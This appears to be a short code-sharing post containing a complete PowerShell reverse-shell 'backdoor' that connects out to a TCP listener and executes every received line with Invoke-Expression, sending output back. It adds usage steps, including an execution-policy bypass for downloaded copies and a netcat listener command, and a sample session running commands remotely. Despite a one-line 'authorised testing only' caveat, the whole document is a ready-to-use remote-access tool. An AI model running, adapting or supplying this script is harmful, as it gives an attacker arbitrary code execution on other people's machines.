metavoid
11/17/2015 - 1:43 PM

connect-back PowerShell backdoor

connect-back PowerShell backdoor — it connects out to a listener and runs every line it receives through Invoke-Expression, with no authentication and no encryption, so anyone who controls (or hijacks) that TCP session gets code execution as the running user. Use only on hosts you are authorised to test.

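# connect-back PowerShell backdoor
#
# Connects to a TCP listener and executes each newline-terminated line it
# receives with Invoke-Expression, writing the command's output (and any
# errors) back over the same socket. Runs until the peer closes the
# connection or an operator sends `exit`.
#
# SECURITY: the remote side is executed by design and there is no
# authentication or encryption on the channel. Whoever owns the listener,
# or can hijack the TCP session, runs arbitrary code as the current user.
# Authorised testing only.
#
# Parameters (defaults match the original hard-coded values):
#   -Addr  listener host
#   -Port  listener TCP port
param(
    [string]$Addr = "localhost",
    [int]$Port = 4444
)

# UTF-8 instead of ASCII: the ASCII encoder turns every non-ASCII character
# into '?', which is what mangles localised Get-ChildItem labels and
# non-English file names in the returned output.
$enc = New-Object System.Text.UTF8Encoding

$client = $null
$stream = $null
try {
    # Connect() failures (listener not up, connection refused) raise here and
    # are handled by the catch/finally below instead of escaping the script.
    $client = New-Object System.Net.Sockets.TcpClient ($Addr, $Port)
    $stream = $client.GetStream()
    $buffer = New-Object System.Byte[] $client.ReceiveBufferSize

    # A single Read() is not a line: it may return part of a command or
    # several commands at once, so bytes are accumulated and split on '\n'.
    $pending = ""

    while ($true) {
        $bytes = $stream.Read($buffer, 0, $buffer.Length)
        if ($bytes -le 0) {
            break   # 0 bytes means the peer closed the connection
        }
        $pending += $enc.GetString($buffer, 0, $bytes)

        while (($nl = $pending.IndexOf("`n")) -ge 0) {
            $command = $pending.Substring(0, $nl).TrimEnd([char]13)
            $pending = $pending.Substring($nl + 1)
            # Invoke-Expression rejects an empty string, so a bare Enter from
            # the operator is ignored rather than producing a binding error.
            if ($command.Length -eq 0) {
                continue
            }

            # Untrusted input is executed on purpose (this is the backdoor).
            # 2>&1 merges the error stream so failed commands are reported to
            # the operator instead of being dropped; the try/catch keeps a
            # terminating error in one command from ending the session.
            try {
                $result = Invoke-Expression $command 2>&1 | Out-String
            } catch {
                $result = $_ | Out-String
            }
            $out = $enc.GetBytes($result)
            $stream.Write($out, 0, $out.Length)
        }
    }
} catch {
    # Connect failure, connection reset, or a write after the peer went away:
    # there is nobody to report to, so exit quietly.
} finally {
    if ($stream) { $stream.Close() }
    if ($client) { $client.Close() }
}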
On the target host (the TCP client — start the listener below first; if nothing is listening the TcpClient constructor throws and the script just exits). `-ex remotesigned` is enough for a locally created script; a downloaded copy carries the Mark-of-the-Web and would need `-ex bypass`:
>powershell -ex remotesigned .\psbackdoor.ps1

On the listener host (the TCP server; must already be running when the client starts — note that traditional netcat wants `nc -l -p 4444` rather than `nc -l 4444`):
$ nc -l 4444
pwd

Path
----
C:\cygwin64\tmp


ls


    Directory: C:\cygwin64\tmp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        2015/11/17     22:33        838 psbackdoor.ps1


exit